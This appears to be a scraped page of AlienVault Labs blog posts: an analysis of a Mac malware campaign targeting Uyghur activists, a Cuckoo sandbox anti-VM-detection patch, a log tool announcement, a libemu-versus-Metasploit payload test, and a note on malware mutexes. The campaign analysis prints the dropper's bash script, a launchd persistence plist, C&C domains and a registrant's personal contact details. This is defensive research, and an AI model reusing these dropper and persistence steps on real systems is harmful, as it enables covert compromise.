AlienVault R&D Labs Portal. Get the latest news from our research.
Header

Cyber espionage campaign against the Uyghur community, targeting MacOSX systems

February 13th, 2013 | Posted by jaime.blasco in APT | Attacks | Blog | Code | Exploits | Malware | News - (Comments Off)

During the last few days together with our colleagues from Kaspersky Lab we have been investigating a new strain of spearphishing mails sent to the Uyghur community. You can read their analysis here.

The mails sent contain a Microsoft Office .doc file that exploits MS09-027 affecting Microsoft Office for Mac, this is the same exploit used in other attacks we discovered in the past.

During the last year we reported a couple of attacks targeting Uyghurs:

- New MaControl variant targeting Uyghur users, the Windows version using Gh0st RAT

Similar attacks have been reported against various ethnic groups like the Tibetan people and other NGOs and human rights organizations:

Targeted attacks against Tibet organizations

MS Office exploit that targets MacOS X seen in the wild – delivers “Mac Control” RAT

They have even used our research as lure to target non-governmental organizations.

Some of the filenames used in this campaign are:

  • WUC Hacking Emails.doc
  • Concerns over Uyghur People.doc
  • Hosh Hewer.doc
  • Jenwediki yighingha iltimas qilish Jediwili.doc
  • Jenwediki yighingha iltimas qilish Jediwili.doc
  • list.doc
  • Press Release on Commemorat the Day of Mourning.doc
  • The Universal Declaration of Human Rights and the Unrecognized Population Groups.doc
  • Uyghur Political Prisoner.doc
  • Deported Uyghurs.doc
  • Kadeer Logistics detail.doc
  • Jenwediki yighingha iltimas qilish Jediwili(Behtiyar Omer).doc
An easy way to identify the documents is looking for the “author” of the document that is always “captain”. This author has been used several times in the past to perform similar attacks.

 

 

 

 

 

 

 

 

 

The following yara rule can be used to identify those files:

rule CaptainWord {
    strings:
         $header = {D0 CF 11 E0 A1 B1 1A E1}
         $author = {00 00 00 63 61 70 74 61 69 6E 00}
    condition:
         $header at 0 and $author
}

Once the victim opens the document the exploit is triggered and the shellcode writes several files on the temporary directory (“/tmp/):

1154/0x2610:  fstat(0x26, 0xBFFF4CD0, 0x200)            = 0 0
1154/0x2610:  lseek(0x26, 0x6600, 0x0)          = 26112 0
1154/0x2610:  open("/tmp/l.sh\0", 0x602, 0x1FF)                 = 40 0
1154/0x2610:  open("/tmp/l\0", 0x602, 0x1FF)            = 41 0
1154/0x2610:  open("/tmp/l.doc\0", 0x602, 0x1FF)                = 42 0
1154/0x2610:  read(0x26, "#!/bin/bash\nsleep 1\n/usr/bin/open /tmp/l.doc\ncp /tmp/l /tmp/m\n/tmp/m\0", 0x44)            = 68 0
1154/0x2610:  write(0x28, "#!/bin/bash\nsleep 1\n/usr/bin/open /tmp/l.doc\ncp /tmp/l /tmp/m\n/tmp/m\0", 0x44)           = 68 0
1154/0x2610:  read(0x26, "\312\376\272\276\0", 0x100)           = 256 0
1154/0x2610:  write(0x29, "\312\376\272\276\0", 0x100)          = 256 0
...
1188/0x2731:  open("/tmp/l\0", 0x0, 0x0)                = 4 0
1188/0x2731:  open("/tmp/m\0", 0x401, 0x0)              = 19 0
…

Then the bash file is executed opening both the trojan and a lure document. There are several lure documents all related with Uyghur activities, an example is:

 

 

 

 

 

 

 

 

 

It is also funny that one of the lure documents talks about the “Rise in possible State-Sponsored hacking”.

Once executed the malware will try to write both the pslist and the backdoor itself under the LaunchAgents directory. This folder is used by MacOSX to store the configuration files that define the parameters of services run by launchd. It will try both under the system and the current user directory:

 

 

 

 

 

 

 

 

 

Then the command “launchctl load” is used to register the new new daemon. The contents of the apple.pslist file are as follow:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>
<plist version=”1.0″>
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>apple</string>
<key>Program</key>
<string>/Users/operator1/library/launchagents/.systm</string>
<key>ProgramArguments</key>
<array>
<string>/Users/operator1/library/launchagents/.systm</string>
<string>1</string>
<string>2</string>
<string>3</string>
<string>4</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

The backdoor contains code from a tool called “Tiny SHell”. You can download the source code of “Tiny SHell” here. You will recognize some of the function names from the source code:

 

 

 

 

 

 

The configuration values are hardcoded in the binary including the encryption key and the C&C address/port:

 

“Tiny SHell” uses AES encryption for the C&C communications and as we can see the attackers are using “12345678″ as the AES secret key:

On the other hand they decided to use the original challenge responses that can be found in the original pel.c file:

The backdoor has only a couple of functionalities:

- Remote shell execution

- File transfers (get/put)

Most of the binaries we obtained  were compiled using debug symbols so we were able to obtain some debug paths from the machine where the files were compiled:

/Users/cbn/Documents/WorkSpace/design/server/aes.c
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/i386/aes.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/i386/pel.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/i386/server.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/i386/sha1.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/i386/shell.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/ppc/aes.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/ppc/pel.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/ppc/server.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/ppc/sha1.o
/Users/cbn/Documents/WorkSpace/design/server/build/server.build/Release/server.build/Objects-normal/ppc/shell.o
/Users/cbn/Documents/WorkSpace/design/server/pel.c
/Users/cbn/Documents/WorkSpace/design/server/server.m
/Users/cbn/Documents/WorkSpace/design/server/sha1.c
/Users/cbn/Documents/WorkSpace/design/server/shell.c

Where “cbn” is the username of the user who compiled those files in the attacker’s system.

The backdoor also writes a VCard containing the data about the current user. The purpose of this is not clear.

Network activity

The attackers are using two different C&C domains:

- apple12[.]crabdance[.]com

- update[.]googmail[.]org

The domain crabdance[.]com is a well known free Dynamic DNS provider. We have been monitoring the second domain googmail[.]org for a while. It has been used by a group we internally named as “xsldmt” due to the mail address they use to register most of their domain names the use.

Domain Name:GOOGMAIL.ORG
Created On:16-Dec-2011 03:01:13 UTC
Last Updated On:20-Nov-2012 04:46:22 UTC
Expiration Date:16-Dec-2013 03:01:13 UTC
Sponsoring Registrar:Xin Net Technology Corporation (R118-LROR)
Status:OK
Registrant ID:4jyn2c9u84snj4
Registrant Name:su guang
Registrant Organization:su guang
Registrant Street1:mi quannanguoxiang1hao
Registrant Street2:
Registrant Street3:
Registrant City:changjihuizuzizhizhou
Registrant State/Province:xinjiangweiwuerzizhiqu
Registrant Postal Code:830000
Registrant Country:CN
Registrant Phone:+86.013579984824
Registrant Phone Ext.:
Registrant FAX:+86.09914682953
Registrant FAX Ext.:
Registrant Email:xsldmt@xj163.cn

The following graph represents the passive DNS data we collected from the ip addresses involved including other potential domains that are probably being used by the same group.

 

Indicators of compromise

Apart from the domain names and ip addresses we released that can be used to check your logs for connections to those addresses, here is a list of file paths that can be checked in your systems to find activity related to these attacks:

/tmp/l
/tmp/m
/tmp/l.sh
/tmp/l.doc
/tmp/systm
/tmp/.systm
/tmp/__system
/tmp/__system*
/tmp/tmpAddressbook.vcf
/Library/LaunchDaemons/systm
/Library/LaunchDaemons/.systm
/Library/LaunchDaemons/apple.plist
/Users/[CurrentUser]/Library/LaunchAgents/systm
/Users/[CurrentUser]/Library/LaunchAgents/.systm
/Users/[CurrentUser]/Library/LaunchAgents/apple.plist

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , ,

Hardening Cuckoo Sandbox against VM aware malware

December 19th, 2012 | Posted by Alberto Ortega in Code | Malware | Windows - (Comments Off)

Some time ago, we wrote a post about how a lot of malware samples check the execution environment, and if it is unwanted (VM, debugger, sandbox, …) the execution unexpectedly finishes.

We use Cuckoo Sandbox in the lab for our analysis tasks, we really love how customizable it is.

Sometimes we have to deal with malware aware of the execution environment, and this is a problem when you are using public virtualization products. Let’s see how modifying some parts of cuckoo we are able to fake crucial parts of the system to the malware sample, so it will not be able to detect the VM (in this case, VirtualBox).

Pafish will help us to test our work, it is a demo tool that performs some anti(debugger/VM/sandbox) tricks, most of them often used by malware. When it is executed, it writes a log with the successful detections, so we can easily track and solve them.

To monitor the malware activity, cuckoo executes the sample with cuckoomon, the part responsible of hooking system calls to save the malware actions. With this powerful hooking system, we can modify the hooks to return fake responses if we do not like the call. For example, calls to check files / registry keys / processes to detect the VM.

When we execute pafish for the first time, it will detect VirtualBox using different tricks:

[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 "Identifier"
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "SystemBiosVersion"
[pafish] VirtualBox traced using Reg key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
[pafish] VirtualBox traced using file C:\WINDOWS\system32\drivers\VBoxMouse.sys
[pafish] End

As we can see, it has detected our VM by reading some registry keys and looking for a file.

The piece of code responsible of hook RegOpenKeyExA (the call used by the detection) is this one (hook_reg.c):

HOOKDEF(LONG, WINAPI, RegOpenKeyExA,
  __in        HKEY hKey,
  __in_opt    LPCTSTR lpSubKey,
  __reserved  DWORD ulOptions,
  __in        REGSAM samDesired,
  __out       PHKEY phkResult
) {
    LONG ret = Old_RegOpenKeyExA(hKey, lpSubKey, ulOptions, samDesired,
        phkResult);
    LOQ("psP", "Registry", hKey, "SubKey", lpSubKey, "Handle", phkResult);
    return ret;
}

So we can modify it:

/* Hardened */
HOOKDEF(LONG, WINAPI, RegOpenKeyExA,
  __in        HKEY hKey,
  __in_opt    LPCTSTR lpSubKey,
  __reserved  DWORD ulOptions,
  __in        REGSAM samDesired,
  __out       PHKEY phkResult
) {
    LONG ret;
    if (strstr(lpSubKey, "VirtualBox") != NULL) {
        ret = 1;
        LOQ("s", "Hardening", "Faked RegOpenKeyExA return");
    }
    else if (strstr(lpSubKey, "ControlSet") != NULL) {
        ret = 1;
        LOQ("s", "Hardening", "Faked RegOpenKeyExA return");
    }
    else {
        ret = Old_RegOpenKeyExA(hKey, lpSubKey, ulOptions, samDesired,
            phkResult);
    }
    LOQ("psP", "Registry", hKey, "SubKey", lpSubKey, "Handle", phkResult);
    return ret;
}

We have changed the code to check if “VirtualBox” or “ControlSet” is in the provided SubKey to read. If it is, we will log a Hardening warning in cuckoo log and fake the response.

We have to do the same with RegQueryValueExA:

HOOKDEF(LONG, WINAPI, RegQueryValueExA,
  __in         HKEY hKey,
  __in_opt     LPCTSTR lpValueName,
  __reserved   LPDWORD lpReserved,
  __out_opt    LPDWORD lpType,
  __out_opt    LPBYTE lpData,
  __inout_opt  LPDWORD lpcbData
) {
    LONG ret = Old_RegQueryValueExA(hKey, lpValueName, lpReserved, lpType,
        lpData, lpcbData);
    LOQ("psLB", "Handle", hKey, "ValueName", lpValueName,
        "Type", lpType, "Buffer", lpcbData, lpData);
    return ret;
}

We change it to:

/* Hardened */
HOOKDEF(LONG, WINAPI, RegQueryValueExA,
  __in         HKEY hKey,
  __in_opt     LPCTSTR lpValueName,
  __reserved   LPDWORD lpReserved,
  __out_opt    LPDWORD lpType,
  __out_opt    LPBYTE lpData,
  __inout_opt  LPDWORD lpcbData
) {
    LONG ret;
    if (strstr(lpValueName, "SystemBiosVersion") != NULL) {
        ret = ERROR_SUCCESS;
        LOQ("s", "Hardening", "Faked RegQueryValueExA return");
    }
    else if (strstr(lpValueName, "Identifier") != NULL) {
        ret = ERROR_SUCCESS;
        LOQ("s", "Hardening", "Faked RegQueryValueExA return");
    }
    else if (strstr(lpValueName, "ProductId") != NULL) {
        ret = ERROR_SUCCESS;
        LOQ("s", "Hardening", "Faked RegQueryValueExA return");
    }
    else {
        ret = Old_RegQueryValueExA(hKey, lpValueName, lpReserved, lpType,
            lpData, lpcbData);
    }
    LOQ("psLB", "Handle", hKey, "ValueName", lpValueName,
        "Type", lpType, "Buffer", lpcbData, lpData);
    return ret;
}

If the malware sample tries to read a registry key with “SystemBiosVersion“, “Identifier” or “ProductId” in the value name, it will fail.

With these two changes, we have covered the two registry keys detections done by pafish. Then we have to change the call used to access the files.

The call used is GetFileAttributesA, which is not hooked by default, so we add it (hook_file.c):

/* Hardened */
HOOKDEF(DWORD, WINAPI, GetFileAttributesA,
  __in      LPCTSTR lpFileName
) {
    BOOL ret;
    if (strstr(lpFileName, "VBox") != NULL) {
        ret = INVALID_FILE_ATTRIBUTES;
        LOQ("s", "Hardening", "Faked GetFileAttributesA return");
    }
    else {
        ret = Old_GetFileAttributesA(lpFileName);
    }
    LOQ("s", "GetFileAttributesA", lpFileName);
    return ret;
}

After that, we have to compile our new cuckoomon.dll and replace the original.

You can find it in cuckoo/analyzer/windows/dll/cuckoomon.dll, you can replace it while cuckoo is running, no need to stop it.

And we are done, we have placed some measures to disallow the samples to detect our VM by using these functions. We can execute pafish again with our new cuckoomon.dll to check the results:

[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] End

It only traced our VM by using the mouse activity, we could hook that too. We can also take a look at cuckoo log to see the responses faked by our hardened monitor:

"pafish.exe","620","532","registry","RegOpenKeyExA","SUCCESS","0x00000000","Registry-&gt;0x80000002","SubKey-&gt;HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0","Handle-&gt;0x0000003c"
"pafish.exe","620","532","registry","RegQueryValueExA","SUCCESS","0x00000000","Hardening-&gt;Faked RegQueryValueExA return"
"pafish.exe","620","532","registry","RegQueryValueExA","SUCCESS","0x00000000","Handle-&gt;0x0000003c","ValueName-&gt;Identifier","Type-&gt;0","Buffer-&gt;0x0022f64c"
"pafish.exe","620","532","registry","RegOpenKeyExA","SUCCESS","0x00000000","Registry-&gt;0x80000002","SubKey-&gt;HARDWARE\Description\System","Handle-&gt;0x00000040"
"pafish.exe","620","532","registry","RegQueryValueExA","SUCCESS","0x00000000","Hardening-&gt;Faked RegQueryValueExA return"
"pafish.exe","620","532","registry","RegQueryValueExA","SUCCESS","0x00000000","Handle-&gt;0x00000040","ValueName-&gt;SystemBiosVersion","Type-&gt;0","Buffer-&gt;0x0022f64c"
"pafish.exe","620","532","registry","RegOpenKeyExA","FAILURE","0x00000001","Hardening-&gt;Faked RegOpenKeyExA return"
"pafish.exe","620","532","registry","RegOpenKeyExA","FAILURE","0x00000001","Registry-&gt;0x80000002","SubKey-&gt;SOFTWARE\Oracle\VirtualBox Guest Additions","Handle-&gt;0x77c05c94"
"pafish.exe","620","532","filesystem","GetFileAttributesA","FAILURE","0xffffffff","Hardening-&gt;Faked GetFileAttributesA return"
"pafish.exe","620","532","filesystem","GetFileAttributesA","FAILURE","0xffffffff","GetFileAttributesA-&gt;C:\WINDOWS\system32\drivers\VBoxMouse.sys"

It is quite difficult to cover all functions used by malware to detect VMs, but with modifications in some common functions we can cover ~90% of the cases.

You can download the modifications made in this post from here, it is a patch compatible with the last stable version of the software. You can also download the compiled library, ready to use in your cuckoo installation.

Alberto Ortega

More Posts

, , , , ,

New Garage Tool: ClearCutter

January 19th, 2012 | Posted by cpconstantine in Code | Code | News | Plugins | Python - (4 Comments)

I’ve just finished committing the first alpha release of ClearCutter to the Alienvault-Garage repository on GoogleCode. It’s a tool born of necessity, for anyone whose spent a good amount of time on those ‘SIEM pre-processing’ tasks, neck-deep in sed, grep,awk, uniq.

Clearcutter (because it ‘clears a forest of logs’) is my work-in-progress combination tool for all those log pre-analysis tasks we here at Alienvault find ourselves doing repetitively. We figure if it’s useful to us, it will be just as useful to other people out there looking to add new device types into OSSIM and find the log entries they need to build effective correlation rules:

Here’s a short planned feature list

  • Find Individual Log messages in a log file – ever tried to find all the unique message types in a log sample? this will do it for you.
    • Make constructing OSSIM collector plugins easier – assistance in writing regexp’s for OSSIM plugin SID entries
  • Find Sequences of Logs in a log file (complete behavioral actions) – need to find all the log messages that indicate a complete user session?
    • Produce Sequence configs and process logs into sequence summaries
  • Test OSSIM collector plugins against log samples – validate that you have a valid plugin config and show what gets parsed by what SID
    • Profile individual regex’s/SID’s against sample logs to see which consume most CPU time – solve those performance mysteries.
You can find the alpha code for clearcutter here or check out via
svn co http://alienvault-labs-garage.googlecode.com/svn/trunk/clearcutter alienvault-labs-garage-read-only
Currently only the first function is implemented,though I’ll be updating this tool rather regularly in-between other things I’m working on, and I’m certainly interested in hearing back from people’s experiences with the accuracy and utility of clearcutter as it progresses. As it stands today, it’s not the fastest tool out there, but Donald Knuth tells me that Early Optimization is the root of all evil, right?

cpconstantine

More Posts - Website

Metasploit Payloads VS Libemu

October 4th, 2011 | Posted by jaime.blasco in Attacks | Blog | Code | Exploits | Python - (Comments Off)

                    

Today we will analyze the detection capabilities of libemu (http://libemu.carnivore.it/) using the Metasploit payloads.
Libemu is a small library to detect and analyze x86 shellcodes using heuristics.

We have written a small script to automatically generate Metasploit payloads and see if libemu is able to detect them. You can download it here.  You’ll need libemu compiled with the python extensions and the Metasploit’s xmlrpc interface up:

./msfrpcd -P test -U test -S -t Web

The script generates all the Metasploit payloads and then use libemu to check if it detects the shellcode. Here is the list of payloads detected by libemu:

PayloadOffset
windows/x64/meterpreter/bind_tcp-4657153
windows/meterpreter/bind_nonx_tcp4
windows/meterpreter/bind_ipv6_tcp1
windows/vncinject/bind_nonx_tcp4
windows/shell/bind_ipv6_tcp1
windows/x64/shell_bind_tcp-4657153
windows/vncinject/bind_ipv6_tcp1
windows/meterpreter/bind_tcp-4657153
windows/patchupmeterpreter/bind_ipv6_tcp1
windows/patchupmeterpreter/bind_nonx_tcp4
windows/vncinject/bind_tcp-4657153
windows/x64/shell/bind_tcp-4657153
linux/x86/adduser-4657153
linux/x86/chmod-4657153
windows/adduser-4657153
windows/shell/bind_nonx_tcp4
windows/x64/vncinject/bind_tcp-4657153
windows/patchupmeterpreter/bind_tcp-4657153
windows/shell_bind_tcp-4657153
windows/shell/bind_tcp-4657153

As we can see libemu is able to detect some of the shellcodes. The next step is to select one of the detected shellcodes and apply different encoders to see if libemu is still able to detect the shellcode.

For this purpose we select windows/x64/meterpreter/bind_tcp and apply different encoders using this script.

Results:

EncoderOffset
x64/xorno detected
x86/alpha_mixedno detected
x86/alpha_upperno detected
x86/avoid_utf8_tolowerno detected
x86/call4_dword_xor0
x86/context_cpuid0
x86/context_stat0
x86/context_time-4657153
x86/countdown0
x86/fnstenv_mov0
x86/jmp_call_additive1
x86/nonalpha-4657153
x86/shikata_ga_nai-4657153
x86/single_static_bit-4657153

So, after this study we can conclude that libemu is a trustful library to detect most of the shellcodes used nowadays.  

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , ,

Malware: Exploring mutex objects

December 28th, 2009 | Posted by jaime.blasco in Code | Malware | Windows - (1 Comments)

A mutex, also called a lock is a program object commonly used to avoid simultaneous access to a resource, such a variable.

It’s used in concurrent programming to allow multiple program threads to share the same resource.

Mutexs are usually used by malware creators to avoid the infection of a system by different instances of the same malware.
When the trojan infects a system, the first step is to obtain a handle to a “named” mutex, if the process fails, then the malware exits.

The easiest way to check for the presence of a Mutex is using the CreateMutex Function

HANDLE WINAPI CreateMutex(
	__in_opt  LPSECURITY_ATTRIBUTES lpMutexAttributes,   
	__in      BOOL bInitialOwner,   __in_opt  LPCTSTR lpName );

This is the same function that malware uses for checking if the system is infected so one approach to detect the presence of a piece of malware is trying to obtain a handle to the created mutex.

Here is a list of some malwares (md5′s) and the Mutex created:

60f733d6d0b077e4a668fb49aab44a30, xx464dg433xx16
fb663100308285afb4debdcab8d67fe2, 6E523163793968624
47c6313ec393d0c55d57529e2a9a418d, Security Tool
72631c3c853d706daf1153b3c8fea54f, psec_once
c37f47c9071eed101a67532e5d412171, YMING
cdcd59a5fb80808cad7376c001586c6e, 290541776
6013de3fed84d40bb173ec23f408a67e, mymutsglwork
62a3f867becfea136aea4ec83a4d9c44, 5BB0650C
5f33aa0b5660bc932af969301635d818, XGBPPAQHSE
2e40abf579e4d8d5d1ba7df34d5e507a, _!SHMSFTHISTORY!_

I’ve uploaded a small piece of code in .NET (console) using PInvoke that takes the name of the mutex to check for.

(Tested on Windows XP SP2 and Windows 7)

Example:

You can use this small application to quickly check if a system is compromised if you know the name of the mutex created by the malware.

In the previous post, we talked about the Windows Kernel Objects as well as the “Object directories”.
We learnt how to query a directory using WinDBG and we found that Mutex as well as other kernel objects are present inside directories.

So now I will explain how to query object directories from user land via NtQueryDirectoryObject to list mutexs present in the system.

We will use the functions NtOpenDirectoryObject and NtQueryDirectoryObject

NTSTATUS WINAPI NtOpenDirectoryObject(   
	__out  PHANDLE DirectoryHandle,   
	__in   ACCESS_MASK DesiredAccess,   
	__in   POBJECT_ATTRIBUTES ObjectAttributes );
NTSTATUS WINAPI NtQueryDirectoryObject(
	   __in       HANDLE DirectoryHandle,   
	   __out_opt  PVOID Buffer,   
	   __in       ULONG Length,   
	   __in       BOOLEAN ReturnSingleEntry,  
	   __in       BOOLEAN RestartScan,   
	   __inout    PULONG Context,   
	   __out_opt  PULONG ReturnLength );

So the best approach to enumerate the Mutex objects is to traverse all the directories beginning with the root directory (“”\\”") and check for “Mutex objects” inside the directory.
We have to take into account that a directory may contains another directory so we have to traverse all of them.

Here is another piece of code to enumerate all the mutex present in the system:

(Tested on Windows XP SP2 and Windows 7)

Example:

Remember that Windows Objects belongs to a namespace and each user session has a different namespace so you will retrieve different results from different user sessions.

I was looking at some mutex results an then I found these:

0x16F:Mutant                   VMwareGuestDnDDataMutex
0x170:Mutant                   VMwareGuestCopyPasteMutex

I think is another interesting trick to detect the presence of a system running inside Vmware.
Searching the Internet I found this report from ThreatExpert about a malware called W32.Neshuta that creates exactly the previous two mutexs.
So the question is if the malware checks for the presence of Vmware with this technique (I bet you a beer) or it uses the same mutants to hide and deceive computer users.

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , , , , ,